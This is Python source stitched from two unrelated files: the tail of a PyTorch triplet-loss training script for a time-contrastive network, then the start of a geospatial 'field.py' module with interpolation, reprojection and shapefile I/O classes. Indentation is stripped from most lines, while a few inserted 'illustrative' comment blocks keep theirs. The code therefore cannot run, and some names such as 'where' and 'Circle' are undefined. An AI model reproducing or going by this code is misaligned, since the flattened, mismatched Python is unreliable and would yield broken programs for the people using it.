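def triplet_margin_loss(anchor_output, positive_output, negative_output, margin=2.0):
    d_positive = distance(anchor_output, positive_output)
    d_negative = distance(anchor_output, negative_output)
    # Penalize triplets where the negative is not at least `margin` farther
    # from the anchor than the positive.
    return torch.clamp(margin + d_positive - d_negative, min=0.0).mean()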
def model_filename(model_name, epoch):
return "{model_name}-epoch-{epoch}.pk".format(model_name=model_name, epoch=epoch)
def save_model(model, filename, model_folder):
ensure_folder(model_folder)
model_path = os.path.join(model_folder, filename)
torch.save(model.state_dict(), model_path)
def build_set(queue, triplet_builder, log):
while 1:
datasets = []
for i in range(6):
dataset = triplet_builder.build_set()
datasets.append(dataset)
dataset = ConcatDataset(datasets)
# log.info('Created {0} triplets'.format(len(dataset)))
queue.put(dataset)
def create_model(use_cuda):
tcn = define_model_ltcn_depth()
# tcn = PosNet()
if args.load_model:
model_path = os.path.join(
args.model_folder,
args.load_model
)
# map_location allows us to load models trained on cuda to cpu.
tcn.load_state_dict(torch.load(model_path, map_location=lambda storage, loc: storage))
if use_cuda:
tcn = tcn.cuda()
return tcn
def main():
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
use_cuda = torch.cuda.is_available()
tcn = create_model(use_cuda)
tcn = torch.nn.DataParallel(tcn, device_ids=range(torch.cuda.device_count()))
triplet_builder = builder(args.n_views, \
args.train_directory, args.train_directory_depth, IMAGE_SIZE, args, sample_size=50)
queue = multiprocessing.Queue(1)
dataset_builder_process = multiprocessing.Process(target=build_set, args=(queue, triplet_builder, logger), daemon=True)
dataset_builder_process.start()
optimizer = optim.SGD(tcn.parameters(), lr=args.lr_start, momentum=0.9)
# This will diminish the learning rate at the milestones.
# With gamma=0.5 the learning rate is halved at epochs 30, 50 and 100.
learning_rate_scheduler = lr_scheduler.MultiStepLR(optimizer, milestones=[30, 50, 100], gamma=0.5)
criterion = nn.CrossEntropyLoss()
trn_losses_ = []
val_losses_= []
val_acc_margin_ = []
val_acc_no_margin_ = []
for epoch in range(args.start_epoch, args.start_epoch + args.epochs):
print("=" * 20)
logger.info("Starting epoch: {0} learning rate: {1}".format(epoch,
learning_rate_scheduler.get_lr()))
learning_rate_scheduler.step()
dataset = queue.get()
data_loader = DataLoader(
dataset=dataset,
batch_size=args.minibatch_size, # batch_size(epoch, args.max_minibatch_size),
shuffle=True,
pin_memory=use_cuda,
)
for _ in range(0, ITERATE_OVER_TRIPLETS):
losses = []
for frames, features in data_loader:
# frames = Variable(minibatch)
if use_cuda:
frames = frames.cuda()
features = features.cuda()
anchor_frames = frames[:, 0, :, :, :]
positive_frames = frames[:, 1, :, :, :]
negative_frames = frames[:, 2, :, :, :]
anchor_features = features[:, 0, :, :, :]
positive_features = features[:, 1, :, :, :]
negative_features = features[:, 2, :, :, :]
anchor_output, unnormalized, _ = tcn(anchor_frames, anchor_features)
positive_output, _, _ = tcn(positive_frames, positive_features)
negative_output, _, _ = tcn(negative_frames, negative_features)
d_positive = distance(anchor_output, positive_output)
d_negative = distance(anchor_output, negative_output)
loss_triplet = torch.clamp(args.margin + d_positive - d_negative, min=0.0).mean()
loss = loss_triplet
losses.append(loss.data.cpu().numpy())
optimizer.zero_grad()
loss.backward()
optimizer.step()
trn_losses_.append(np.mean(losses))
logger.info('train loss: {}'.format(np.mean(losses)))
if epoch % 1 == 0:
acc_margin, acc_no_margin, loss = validate(tcn, use_cuda, args)
val_losses_.append(loss)
val_acc_margin_.append(acc_margin)
val_acc_no_margin_.append(acc_no_margin)
if epoch % args.save_every == 0 and epoch != 0:
logger.info('Saving model.')
save_model(tcn, model_filename(args.model_name, epoch), args.model_folder)
plot_mean(trn_losses_, args.model_folder, 'train_loss')
plot_mean(val_losses_, args.model_folder, 'validation_loss')
# plot_mean(train_acc_, args.model_folder, 'train_acc')
plot_mean(val_acc_margin_, args.model_folder, 'validation_accuracy_margin')
plot_mean(val_acc_no_margin_, args.model_folder, 'validation_accuracy_no_margin')
if __name__ == '__main__':
main()
|
field.py
|
from __future__ import division
from __future__ import print_function
# still tracking down the last few calls missing the np. prefix,
# leftover from 'from numpy import *'
import numpy as np
import glob,types
import copy
from numpy.random import random
from numpy import ma
from numpy.linalg import norm
import tempfile
from scipy import interpolate
try:
from scipy.stats import nanmean
except ImportError:
from numpy import nanmean
from scipy import signal
from scipy import ndimage
from scipy.interpolate import RectBivariateSpline
from functools import wraps
# Lazily loads plt just for plotting functions.
# Gross, but helpful??
def with_plt(f):
@wraps(f)
def wrapper(*args, **kwds):
global plt
import matplotlib.pyplot as plt
return f(*args, **kwds)
return wrapper
try:
import matplotlib.tri as delaunay
except ImportError:
# older deprecated module
from matplotlib import delaunay
from . import wkb2shp
from ..utils import array_append, isnat, circumcenter, dist, set_keywords
try:
from matplotlib import cm
except ImportError:
cm = None
# load both types of indices, so we can choose per-field
# which one to use
from .gen_spatial_index import PointIndex,RectIndex
# Older code tried to use multiple implementations
# import stree
# from safe_rtree import Rtree
# from rtree.index import Rtree
xxyy = np.array([0,0,1,1])
xyxy = np.array([0,1,0,1])
def as_xxyy(p1p2):
p1p2=np.asarray(p1p2)
if p1p2.ndim == 1:
return p1p2 # presumably it's already xxyy layout
else:
return np.array(p1p2[xyxy,xxyy])
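# Example (illustrative, not part of the module API): as_xxyy converts corner points
# [[xmin, ymin], [xmax, ymax]] into the flat [xmin, xmax, ymin, ymax] layout used
# throughout this module, so
#   as_xxyy([[0.0, 10.0], [5.0, 20.0]]) -> array([ 0.,  5., 10., 20.])
# while an already-flat 4-element sequence is passed through unchanged.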
from .linestring_utils import upsample_linearring
try:
import cPickle as pickle
except ImportError:
import pickle
import subprocess,threading
import logging
log=logging.getLogger(__name__)
try:
from osgeo import gdal,osr,ogr
except ImportError:
try:
import gdal,osr,ogr
except ImportError:
gdal=osr=ogr=None
log.warning("GDAL not loaded")
try:
from shapely import geometry, wkb
try:
from shapely.prepared import prep
except ImportError:
prep = None
except ImportError:
log.warning("Shapely not loaded")
wkb=geometry=None
import os.path
if gdal:
numpy_type_to_gdal = {np.int8:gdal.GDT_Byte, # meh. not quite real, most likely
np.uint8:gdal.GDT_Byte,
np.float32:gdal.GDT_Float32,
np.float64:gdal.GDT_Float64,
np.int16:gdal.GDT_Int16,
np.int32:gdal.GDT_Int32,
int:gdal.GDT_Int32,
np.uint16:gdal.GDT_UInt16,
np.uint32:gdal.GDT_UInt32}
# # try to create an easier way to handle non-uniform meshes. In particular
# # it would be nice to be able to something like:
#
# foo = field.gdal_source('foo.asc') # grid is lat/lon
#
# foo_utm = foo.transform_to('EPSG:26910')
#
# bar = field.xyz_source('bar.xyz') # point data
#
# # this uses the foo_utm grid, adds values interpolated from bar, and any
# # points where bar cannot interpolate are assigned nan.
# foo_bar = foo_utm.add(bar,keep='valid')
class Field(object):
""" Superclass for spatial fields
"""
def __init__(self,projection=None):
"""
projection: GDAL/OGR parseable string representation
"""
self.assign_projection(projection)
def assign_projection(self,projection):
self._projection = projection
def reproject(self,from_projection=None,to_projection=None):
""" Reproject to a new coordinate system.
If the input is structured, this will create a curvilinear
grid, otherwise it creates an XYZ field.
"""
xform = self.make_xform(from_projection,to_projection)
new_field = self.apply_xform(xform)
new_field._projection = to_projection
return new_field
def copy(self):
return copy.copy(self)
def make_xform(self,from_projection,to_projection):
if from_projection is None:
from_projection = self.projection()
if from_projection is None:
raise Exception("No source projection can be determined")
src_srs = osr.SpatialReference()
src_srs.SetFromUserInput(from_projection)
dest_srs = osr.SpatialReference()
dest_srs.SetFromUserInput(to_projection)
xform = osr.CoordinateTransformation(src_srs,dest_srs)
return xform
def xyz(self):
raise Exception("Not implemented")
def crop(self,rect):
raise Exception("Not implemented")
def projection(self):
return self._projection
def bounds(self):
raise Exception("Not Implemented")
def bounds_in_cs(self,cs):
b = self.bounds()
xform = self.make_xform(self.projection(),cs)
corners = [ [b[0],b[2]],
[b[0],b[3]],
[b[1],b[2]],
[b[1],b[3]] ]
new_corners = np.array( [xform.TransformPoint(c[0],c[1])[:2] for c in corners] )
xmin = new_corners[:,0].min()
xmax = new_corners[:,0].max()
ymin = new_corners[:,1].min()
ymax = new_corners[:,1].max()
return [xmin,xmax,ymin,ymax]
def quantize_space(self,quant):
self.X = np.round(self.X)
def envelope(self,eps=1e-4):
""" Return a rectangular shapely geometry the is the bounding box of
this field.
"""
b = self.bounds()
return geometry.Polygon( [ [b[0]-eps,b[2]-eps],
[b[1]+eps,b[2]-eps],
[b[1]+eps,b[3]+eps],
[b[0]-eps,b[3]+eps],
[b[0]-eps,b[2]-eps] ])
## Some methods taken from density_field, which Field will soon supplant
def value(self,X):
""" in density_field this was called 'scale' - evaluates the field
at the given point or vector of points. Some subclasses can be configured
to interpolate in various ways, but by default should do something reasonable
"""
raise Exception("not implemented")
# X = np.array(X)
# return self.constant * np.ones(X.shape[:-1])
def value_on_edge(self,e,samples=5,reducer=np.nanmean):
""" Return the value averaged along an edge - the generic implementation
just takes 5 samples evenly spaced along the line, using value()
"""
x=np.linspace(e[0,0],e[1,0],samples)
y=np.linspace(e[0,1],e[1,1],samples)
X = np.array([x,y]).transpose()
return reducer(self.value(X))
def __call__(self,X):
return self.value(X)
def __mul__(self,other):
return BinopField(self,np.multiply,other)
def __rmul__(self,other):
return BinopField(other,np.multiply,self)
def __add__(self,other):
return BinopField(self,np.add,other)
def __sub__(self,other):
return BinopField(self,np.subtract,other)
def to_grid(self,nx=None,ny=None,interp='linear',bounds=None,dx=None,dy=None,valuator='value'):
""" bounds is a 2x2 [[minx,miny],[maxx,maxy]] array, and is *required* for BlenderFields
bounds can also be a 4-element sequence, [xmin,xmax,ymin,ymax], for compatibility with
matplotlib axis(), and Paving.default_clip.
specify *one* of:
nx,ny: specify number of samples in each dimension
dx,dy: specify resolution in each dimension
interp used to default to nn, but that is no longer available in mpl, so now use linear.
bounds is interpreted as the range of center locations of pixels. This gets a bit
gross, but that is how some of the tile functions below work.
"""
if bounds is None:
xmin,xmax,ymin,ymax = self.bounds()
else:
if len(bounds) == 2:
xmin,ymin = bounds[0]
xmax,ymax = bounds[1]
else:
xmin,xmax,ymin,ymax = bounds
if nx is None:
nx=1+int(np.round((xmax-xmin)/dx))
ny=1+int(np.round((ymax-ymin)/dy))
x = np.linspace( xmin,xmax, nx )
y = np.linspace( ymin,ymax, ny )
xx,yy = np.meshgrid(x,y)
X = np.concatenate( (xx[...,None], yy[...,None]), axis=2)
if valuator=='value':
newF = self.value(X)
else:
valuator = getattr(self,valuator)
newF = valuator(X)
return SimpleGrid(extents=[xmin,xmax,ymin,ymax],
F=newF,projection=self.projection())
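# Illustrative sketch (not part of the original module): a minimal Field subclass
# showing how value(), bounds() and to_grid() are expected to fit together.
# ConstantDemoField is hypothetical; SimpleGrid is assumed to be the raster class
# referenced by to_grid() and described in the comments below.
class ConstantDemoField(Field):
    """Field that evaluates to the same constant everywhere."""
    def __init__(self, c, projection=None):
        Field.__init__(self, projection=projection)
        self.c = c
    def value(self, X):
        X = np.asarray(X)
        # One value per query point, broadcast over the leading dimensions.
        return self.c * np.ones(X.shape[:-1])
    def bounds(self):
        return (0.0, 1.0, 0.0, 1.0)
# e.g. ConstantDemoField(5.0).to_grid(dx=0.5, dy=0.5) yields a 3x3 SimpleGrid
# whose F array is uniformly 5.0.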
# Different internal representations:
# SimpleGrid - constant dx, dy, data just stored in array.
class XYZField(Field):
def __init__(self,X,F,projection=None,from_file=None):
""" X: Nx2 array of x,y locations
F: N array of values
"""
Field.__init__(self,projection=projection)
self.X = X
self.F = F
self.index = None
self.from_file = from_file
self.init_listeners()
@with_plt
def plot(self,**kwargs):
# this is going to be slow...
def_args = {'c':self.F,
'antialiased':False,
'marker':'s',
'lw':0}
def_args.update(kwargs)
plt.scatter( self.X[:,0].ravel(),
self.X[:,1].ravel(),
**def_args)
def bounds(self):
if self.X.shape[0] == 0:
return None
xmin = self.X[:,0].min()
xmax = self.X[:,0].max()
ymin = self.X[:,1].min()
ymax = self.X[:,1].max()
return (xmin,xmax,ymin,ymax)
def apply_xform(self,xform):
new_fld=self.copy()
new_X = self.X.copy()
if len(self.F)>10000:
print("Transforming points")
for i in range(len(self.F)):
if i>0 and i % 10000 == 0:
print("%.2f%%"%( (100.0*i) / len(self.F)) )
new_X[i] = xform.TransformPoint(*self.X[i])[:2]
if len(self.F)>10000:
print("Done transforming points")
# projection should get overwritten by the caller
new_fld.X=new_X
return new_fld
# an XYZ Field of our voronoi points
_tri = None
def tri(self,aspect=1.0):
if aspect!=1.0:
return delaunay.Triangulation(self.X[:,0],
aspect*self.X[:,1])
if self._tri is None:
self._tri = delaunay.Triangulation(self.X[:,0],
self.X[:,1])
return self._tri
def plot_tri(self,**kwargs):
import plot_utils
plot_utils.plot_tri(self.tri(),**kwargs)
_nn_interper = None
def nn_interper(self,aspect=1.0):
if aspect!=1.0:
try:
return self.tri(aspect=aspect).nn_interpolator(self.F)
except AttributeError:
raise Exception("Request for nearest-neighbors, which was discontinued by mpl")
if self._nn_interper is None:
try:
self._nn_interper = self.tri().nn_interpolator(self.F)
except AttributeError:
raise Exception("Request for nearest-neighbors, which was discontinued by mpl")
return self._nn_interper
_lin_interper = None
def lin_interper(self,aspect=1.0):
def get_lin_interp(t,z):
try:
return t.linear_interpolator(z)
except AttributeError: # modern matplotlib separates this out:
from matplotlib.tri import LinearTriInterpolator
return LinearTriInterpolator(t,z)
if aspect!=1.0:
return get_lin_interp(self.tri(aspect=aspect),self.F)
if self._lin_interper is None:
self._lin_interper = get_lin_interp(self.tri(),self.F)
return self._lin_interper
#_voronoi = None
# default_interpolation='naturalneighbor'# phased out by mpl
default_interpolation='linear'
# If true, linear interpolation will revert to nearest when queried outside
# the convex hull
outside_hull_fallback=True
def interpolate(self,X,interpolation=None):
"""
X: [...,2] coordinates at which to interpolate.
interpolation: should have been called 'method'.
The type of interpolation.
'nearest': select nearest source point
'naturalneighbor': Deprecated (only works with very old MPL)
Delaunay triangulation-based natural neighbor interpolation.
'linear': Delaunay-based linear interpolation.
"""
if interpolation is None:
interpolation=self.default_interpolation
# X should be a (N,2) vectors - make it so
X=np.asanyarray(X).reshape([-1,2])
newF = np.zeros( X.shape[0], np.float64 )
if interpolation=='nearest':
for i in range(len(X)):
if i % 10000 == 1:
print( " %.2f%%"%( (100.0*i)/len(X) ))
if not self.index:
dsqr = ((self.X - X[i])**2).sum(axis=1)
j = np.argmin( dsqr )
else:
j = self.nearest(X[i])
newF[i] = self.F[j]
elif interpolation=='naturalneighbor':
newF = self.nn_interper()(X[:,0],X[:,1])
# print "why aren't you using linear?!"
elif interpolation=='linear':
interper = self.lin_interper()
newF[:] = interper(X[:,0],X[:,1])
if self.outside_hull_fallback:
# lin_interper may return masked array instead
# of nans.
newF=np.ma.filled(newF,np.nan)
bad=np.isnan(newF)
if np.any(bad):
# Old approach, use nearest:
newF[bad]=self.interpolate(X[bad],'nearest')
else:
raise Exception("Bad value for interpolation method %s"%interpolation)
return newF
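    # Illustrative sketch (assumed usage, not from the original source):
    # scattered samples interpolated at query points. Coordinates and values
    # below are made up.
    #   fld = XYZField(X=np.array([[0.,0.],[1.,0.],[0.,1.],[1.,1.]]),
    #                  F=np.array([0.,1.,1.,2.]))
    #   fld.interpolate(np.array([[0.5,0.5]]),interpolation='linear')  # => 1.0
    #   fld.interpolate(np.array([[-5.,-5.]]),interpolation='nearest') # => 0.0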
def build_index(self,index_type=None):
if index_type is not None:
log.warning("Ignoring request for specific index type")
self.index_type = 'rtree'
if self.X.shape[0] > 0:
# this way we get some feedback
def gimme():
i = gimme.i
if i < self.X.shape[0]:
if i %10000 == 0 and i>0:
print("building index: %d - %.2f%%"%(i, 100.0 * i / self.X.shape[0] ))
gimme.i = i+1
return (i,self.X[i,xxyy],None)
else:
return None
gimme.i = 0
tuples = iter(gimme,None)
#print "just building Rtree index in memory"
self.index = PointIndex(tuples,interleaved=False)
else:
self.index = PointIndex(interleaved=False)
#print "Done"
def within_r(self,p,r):
if self.index:
if self.index_type == 'stree':
subset = self.index.within_ri(p,r)
else: # rtree
# first query a rectangle
rect = np.array( [p[0]-r,p[0]+r,p[1]-r,p[1]+r] )
subset = self.index.intersection( rect )
if isinstance(subset, types.GeneratorType):
subset = list(subset)
subset = np.array( subset )
if len(subset) > 0:
dsqr = ((self.X[subset]-p)**2).sum(axis=1)
subset = subset[ dsqr<=r**2 ]
return subset
else:
# print "bad - no index"
dsqr = ((self.X-p)**2).sum(axis=1)
return where(dsqr<=r**2)[0]
def inv_dist_interp(self,p,
min_radius=None,min_n_closest=None,
clip_min=-np.inf,clip_max=np.inf,
default=None):
""" inverse-distance weighted interpolation
This is a bit funky because it tries to be smart about interpolation
both in dense and sparse areas.
min_radius: sample from at least this radius around p
min_n_closest: sample from at least this many points
"""
if min_radius is None and min_n_closest is None:
raise Exception("Must specify one of r (radius) or n_closest")
r = min_radius
if r:
nearby = self.within_r(p,r)
# have we satisfied the criteria? if a radius was specified
if min_n_closest is not None and len(nearby) < min_n_closest:
# fall back to nearest
nearby = self.nearest(p,min_n_closest)
else:
# this is slow when we have no starting radius
nearby = self.nearest(p,min_n_closest)
dists = np.sqrt( ((p-self.X[nearby])**2).sum(axis=1) )
# may have to trim back some of the extras:
if r is not None and r > min_radius:
good = np.argsort(dists)[:min_n_closest]
nearby = nearby[good]
dists = dists[good]
if min_radius is None:
# hrrmph. arbitrary...
min_radius = dists.mean()
dists[ dists < 0.01*min_radius ] = 0.01*min_radius
weights = 1.0/dists
vals = self.F[nearby]
vals = np.clip(vals,clip_min,clip_max)
val = (vals * weights).sum() / weights.sum()
return val
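    # For reference, the weighting used above (a sketch, not executed): with
    # sample distances d_i and values v_i,
    #   w_i = 1.0/max(d_i, 0.01*min_radius)
    #   val = sum(w_i*v_i)/sum(w_i)
    # so a nearly coincident sample cannot completely dominate the estimate.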
def nearest(self,p,count=1):
# print " Field::nearest(p=%s,count=%d)"%(p,count)
if self.index:
if self.index_type=='stree':
if count == 1:
return self.index.closest(p)
else:
return self.index.n_closest(p,count)
else: # rtree
hits = self.index.nearest( p[xxyy], count )
# deal with API change in RTree
if isinstance( hits, types.GeneratorType):
hits = [next(hits) for i in range(count)]
if count == 1:
return hits[0]
else:
return np.array(hits)
else:
# straight up, it takes 50ms per query for a small
# number of points
dsqr = ((self.X - p)**2).sum(axis=1)
if count == 1:
j = np.argmin( dsqr )
return j
else:
js = np.argsort( dsqr )
return js[:count]
def rectify(self,dx=None,dy=None):
""" Convert XYZ back to SimpleGrid. Assumes that the data fall on a regular
grid. if dx and dy are None, automatically find the grid spacing/extents.
"""
max_dimension = 10000.
# Try to figure out a rectilinear grid that fits the data:
xmin,xmax,ymin,ymax = self.bounds()
# establish lower bound on delta x:
if dx is None:
min_deltax = (xmax - xmin) / max_dimension
xoffsets = self.X[:,0] - xmin
dx = xoffsets[xoffsets>min_deltax].min()
if dy is None:
min_deltay = (ymax - ymin) / max_dimension
yoffsets = self.X[:,1] - ymin
dy = yoffsets[yoffsets>min_deltay].min()
print("Found dx=%g dy=%g"%(dx,dy))
nrows = 1 + int( 0.49 + (ymax - ymin) / dy )
ncols = 1 + int( 0.49 + (xmax - xmin) / dx )
# recalculate dx to be accurate over the whole range:
dx = (xmax - xmin) / (ncols-1)
dy = (ymax - ymin) / (nrows-1)
delta = np.array([dx,dy])
newF = np.nan*np.ones( (nrows,ncols), np.float64 )
new_indices = (self.X - np.array([xmin,ymin])) / delta + 0.49
new_indices = new_indices.astype(np.int32)
new_indices = new_indices[:,::-1]
newF[new_indices[:,0],new_indices[:,1]] = self.F
return SimpleGrid(extents=[xmin,xmax,ymin,ymax],
F=newF,projection=self.projection())
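    # Illustrative sketch (hypothetical data): points already on a 10 m
    # lattice are packed back into a SimpleGrid.
    #   xy = np.array([[x,y] for y in np.arange(0,30,10.)
    #                        for x in np.arange(0,50,10.)])
    #   fld = XYZField(xy,np.arange(len(xy),dtype=np.float64))
    #   sg = fld.rectify()      # infers dx=dy=10 from the point spacing
    #   sg.F.shape              # => (3,5)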
def to_grid(self,nx=2000,ny=2000,interp='linear',bounds=None,dx=None,dy=None,
aspect=1.0,max_radius=None):
""" use the delaunay based griddata() to interpolate this field onto
a rectilinear grid. In theory interp='linear' would give bilinear
interpolation, but it tends to complain about grid spacing, so best to stick
with the default 'nn' which gives natural neighbor interpolation and is willing
to accept a wider variety of grids
Here we use a specialized implementation that passes the extent/stride array
to interper, since lin_interper requires this.
interp='qhull': use scipy's delaunay/qhull interface. this can
additionally accept a radius which limits the output to triangles
with a smaller circumradius.
"""
if bounds is None:
xmin,xmax,ymin,ymax = self.bounds()
else:
if len(bounds) == 4:
xmin,xmax,ymin,ymax = bounds
else:
xmin,ymin = bounds[0]
xmax,ymax = bounds[1]
        if dx is not None: # Takes precedence over nx/ny
# This seems a bit heavy handed
# round xmin/ymin to be an even multiple of dx/dy
# xmin = xmin - (xmin%dx)
# ymin = ymin - (ymin%dy)
# The 1+, -1, stuff feels a bit sketch. But this is how
# CompositeField calculates sizes
nx = 1 + int( (xmax-xmin)/dx )
ny = 1 + int( (ymax-ymin)/dy )
xmax = xmin + (nx-1)*dx
ymax = ymin + (ny-1)*dy
# hopefully this is more compatible between versions, also exposes more of what's
# going on
if interp == 'nn':
interper = self.nn_interper(aspect=aspect)
elif interp=='linear':
interper = self.lin_interper(aspect=aspect)
elif interp=='qhull':
interper = self.qhull_interper(max_radius=max_radius)
try:
griddedF = interper[aspect*ymin:aspect*ymax:ny*1j,xmin:xmax:nx*1j]
except TypeError: # newer interpolation doesn't have [y,x] notation
y=np.linspace(aspect*ymin,aspect*ymax,ny)
x=np.linspace(xmin,xmax,nx)
# y,x led to the dimensions being swapped
X,Y=np.meshgrid(x,y)
# Y,X below led to all values being nan...
griddedF = interper(X,Y) # not sure about index ordering here...
return SimpleGrid(extents=[xmin,xmax,ymin,ymax],F=griddedF)
def qhull_interper(self,max_radius=None):
from scipy.spatial import Delaunay
from scipy.interpolate import LinearNDInterpolator
tri=Delaunay(self.X)
if max_radius is not None:
tris=tri.simplices
ccs=circumcenter( tri.points[tri.simplices[:,0]],
tri.points[tri.simplices[:,1]],
tri.points[tri.simplices[:,2]] )
rad=dist(ccs-tri.points[tri.simplices[:,0]])
bad=rad>max_radius
else:
bad=None
lin_nd=LinearNDInterpolator(tri,self.F)
def interper(X,Y,lin_nd=lin_nd,bad=bad,tri=tri):
XY=np.stack((X,Y),axis=-1)
XYr=XY.reshape([-1,2])
simps=tri.find_simplex(XYr)
result=lin_nd(XYr)
if bad is not None:
result[(simps<0)|(bad[simps])]=np.nan
return result.reshape(X.shape)
return interper
def crop(self,rect):
if len(rect)==2:
rect=[rect[0][0],rect[1][0],rect[0][1],rect[1][1]]
xmin,xmax,ymin,ymax = rect
good = (self.X[:,0] >= xmin ) & (self.X[:,0] <= xmax ) & (self.X[:,1] >= ymin) & (self.X[:,1]<=ymax)
newX = self.X[good,:]
newF = self.F[good]
return XYZField(newX,newF, projection = self.projection() )
def write_text(self,fname,sep=' '):
        fp = open(fname,'wt')
for i in range(len(self.F)):
fp.write( "%f%s%f%s%f\n"%(self.X[i,0],sep,
self.X[i,1],sep,
self.F[i] ) )
fp.close()
def intersect(self,other,op,radius=0.1):
""" Create new pointset that has points that are in both fields, and combine
the values with the given operator op(a,b)
"""
my_points = []
new_F = []
if not self.index:
self.build_index()
for i in range(len(other.F)):
if i % 10000 == 0:
print("%.2f%%"%(100.0*i/len(other.F)))
p = self.within_r( other.X[i], radius )
if len(p) > 0:
# fudge it and take the first one...
my_points.append(p[0])
new_F.append( op(self.F[p[0]],other.F[i] ) )
my_points = np.array(my_points)
new_F = np.array(new_F)
new_X = self.X[ my_points ]
return XYZField( new_X, new_F )
def decimate(self,factor):
        chooser = np.random.random( self.F.shape ) < 1.0/factor
return XYZField( self.X[chooser,:], self.F[chooser], projection = self.projection() )
def clip_to_polygon(self,poly):
if not self.index:
self.build_index()
if prep:
            chooser = np.zeros(len(self.F),bool)
prep_poly = prep(poly)
for i in range(len(self.F)):
chooser[i] = prep_poly.contains( geometry.Point(self.X[i]) )
else:
# this only works with the stree implementation.
chooser = self.index.inside_polygon(poly)
if len(chooser) == 0:
print("Clip to polygon got no points!")
print("Returning empty field")
            return XYZField( np.zeros((0,2),np.float64), np.zeros( 0, np.float64) )
else:
return XYZField( self.X[chooser,:], self.F[chooser] )
def cs2cs(self,
src="+proj=utm +zone=10 +datum=NAD27 +nadgrids=conus",
dst="+proj=utm +zone=10 +datum=NAD83"):
""" In place modification of coordinate system. Defaults to UTM NAD27 -> UTM NAD83
"""
cmd = "cs2cs -f '%%f' %s +to %s"%(src,dst)
        proc = subprocess.Popen(cmd,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,
                                universal_newlines=True) # text-mode pipes so str read/write works
pnts = []
def reader():
while 1:
line = proc.stdout.readline()
if line == '':
break
pnts.append(list(map(float,line.split()[:2])))
thr = threading.Thread(target = reader)
thr.start()
point_count = len(self.F)
for i in range(point_count):
if i % 10000 == 0:
print("%.2f%%"%( (100.0*i)/point_count ))
proc.stdin.write("%.2f %.2f\n"%(self.X[i,0], self.X[i,1]) )
proc.stdin.close()
print("Finished writing")
thr.join()
pnts = np.array(pnts)
if pnts.shape != self.X.shape:
raise Exception('Size of converted points is %s, not %s'%( pnts.shape, self.X.shape ) )
self.X = pnts
def write(self,fname):
fp = open(fname,'wb')
pickle.dump( (self.X,self.F), fp, -1)
fp.close()
def to_xyz(self):
# should this be self, or a copy of self???
return self
@staticmethod
def read_shp(shp_name,value_field='value'):
ods = ogr.Open(shp_name)
X = []
F = []
layer = ods.GetLayer(0)
while 1:
feat = layer.GetNextFeature()
if feat is None:
break
F.append( feat.GetField(value_field) )
geo = feat.GetGeometryRef()
X.append( geo.GetPoint_2D() )
X = np.array( X )
F = np.array( F )
return XYZField(X=X,F=F,from_file=shp_name)
def write_shp(self,shp_name,value_field='value'):
drv = ogr.GetDriverByName('ESRI Shapefile')
### open the output shapefile
if os.path.exists(shp_name) and shp_name.find('.shp')>=0:
print("removing ",shp_name)
os.unlink(shp_name)
ods = drv.CreateDataSource(shp_name)
srs = osr.SpatialReference()
if self.projection():
srs.SetFromUserInput(self.projection())
else:
srs.SetFromUserInput('EPSG:26910')
layer_name = os.path.splitext( os.path.basename(shp_name) )[0]
### Create the layer
olayer = ods.CreateLayer(layer_name,
srs=srs,
geom_type=ogr.wkbPoint)
olayer.CreateField(ogr.FieldDefn('id',ogr.OFTInteger))
olayer.CreateField(ogr.FieldDefn(value_field,ogr.OFTReal))
fdef = olayer.GetLayerDefn()
### Iterate over depth data
for i in range(len(self.X)):
x,y = self.X[i]
wkt = geometry.Point(x,y).wkt
new_feat_geom = ogr.CreateGeometryFromWkt( wkt )
feat = ogr.Feature(fdef)
feat.SetGeometryDirectly(new_feat_geom)
feat.SetField('id',i)
feat.SetField(value_field,self.F[i])
olayer.CreateFeature(feat)
olayer.SyncToDisk()
### Create spatial index:
ods.ExecuteSQL("create spatial index on %s"%layer_name)
@staticmethod
def read(fname):
"""
Read XYZField from a pickle file
"""
fp = open(fname,'rb')
X,F = pickle.load( fp )
fp.close()
return XYZField(X=X,F=F,from_file=fname)
@staticmethod
def merge(all_sources):
        all_X = np.concatenate( [s.X for s in all_sources] )
        all_F = np.concatenate( [s.F for s in all_sources] )
return XYZField(all_X,all_F,projection=all_sources[0].projection())
## Editing API for use with GUI editor
def move_point(self,i,pnt):
self.X[i] = pnt
if self.index:
if self.index_type == 'stree':
self.index = None
else:
old_coords = self.X[i,xxyy]
new_coords = pnt[xxyy]
self.index.delete(i, old_coords )
self.index.insert(i, new_coords )
self.updated_point(i)
def add_point(self,pnt,value):
""" Insert a new point into the field, clearing any invalidated data
and returning the index of the new point
"""
i = len(self.X)
self.X = array_append(self.X,pnt)
self.F = array_append(self.F,value)
self._tri = None
self._nn_interper = None
self._lin_interper = None
if self.index is not None:
if self.index_type == 'stree':
print("Stree doesn't know how to add points")
self.index = None
else:
print("Adding new point %d to index at "%i,self.X[i])
self.index.insert(i, self.X[i,xxyy] )
self.created_point(i)
return i
def delete_point(self,i):
if self.index is not None:
if self.index_type == 'stree':
print("Stree doesn't know how to delete point")
self.index = None
else:
coords = self.X[i,xxyy]
self.index.delete(i, coords )
self.X[i,0] = np.nan
self.F[i] = np.nan
self.deleted_point(i)
# subscriber interface for updates:
listener_count = 0
def init_listeners(self):
self._update_point_listeners = {}
self._create_point_listeners = {}
self._delete_point_listeners = {}
def listen(self,event,cb):
cb_id = self.listener_count
if event == 'update_point':
self._update_point_listeners[cb_id] = cb
elif event == 'create_point':
self._create_point_listeners[cb_id] = cb
elif event == 'delete_point':
self._delete_point_listeners[cb_id] = cb
else:
raise Exception("unknown event %s"%event)
self.listener_count += 1
return cb_id
def updated_point(self,i):
for cb in self._update_point_listeners.values():
cb(i)
def created_point(self,i):
for cb in self._create_point_listeners.values():
cb(i)
def deleted_point(self,i):
for cb in self._delete_point_listeners.values():
cb(i)
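    # Illustrative sketch of the listener interface (hypothetical field `fld`
    # and callback):
    #   def on_update(i):
    #       print("point %d moved"%i)
    #   cb_id = fld.listen('update_point',on_update)
    #   fld.move_point(0,np.array([10.,20.]))   # triggers on_update(0)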
## Methods taken from XYZDensityField
def value(self,X):
""" X must be shaped (...,2)
"""
X = np.asanyarray(X)
orig_shape = X.shape
X = X.reshape((-1,2))
newF = self.interpolate(X)
newF = newF.reshape(orig_shape[:-1])
if newF.ndim == 0:
return float(newF)
else:
return newF
@with_plt
def plot_on_boundary(self,bdry):
        # bdry is an array of vertices (presumably on the boundary)
l = np.zeros( len(bdry), np.float64 )
ax = plt.gca()
for i in range(len(bdry)):
l[i] = self.value( bdry[i] )
cir = Circle( bdry[i], radius=l[i])
ax.add_patch(cir)
# Pickle support -
